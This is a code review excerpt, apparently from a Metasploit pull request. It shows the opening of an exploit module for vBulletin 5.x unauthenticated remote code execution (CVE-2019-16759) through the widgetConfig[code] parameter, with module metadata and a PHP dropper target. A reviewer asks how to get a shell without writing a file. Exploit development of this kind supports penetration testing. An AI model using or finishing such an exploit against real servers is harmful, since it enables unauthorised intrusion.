modules/exploits/multi/http/vbulletin_5x_unauth_rce.rb

```diff
@@ -0,0 +1,189 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'vBulletin 5.x pre-auth RCE',
+      'Description' => %q{
+        vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]
+        parameter in an ajax/render/widget_php routestring request.
+      },
+      'Author' => [
+        # discovered by an unknown sender.
+        'mekhalleh (RAMELLA Sébastien)' # this module.
+      ],
+      'References' => [
+        ['CVE', '2019-16759'],
+        ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31']
+      ],
+      'DisclosureDate' => '2019-09-23',
+      'License' => MSF_LICENSE,
+      'Platform' => ['linux', 'php', 'unix', 'windows'],
+      'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X86, ARCH_X64],
+      'Privileged' => true,
+      'Targets' => [
+        ['Automatic (Dropper)',
+          'Platform' => 'php',
+          'Arch' => [ARCH_PHP],
+          'Type' => :php_dropper,
```

Comment:
Since the code is executed within the context of `eval()`, is it possible to get a shell without dropping a file on the system?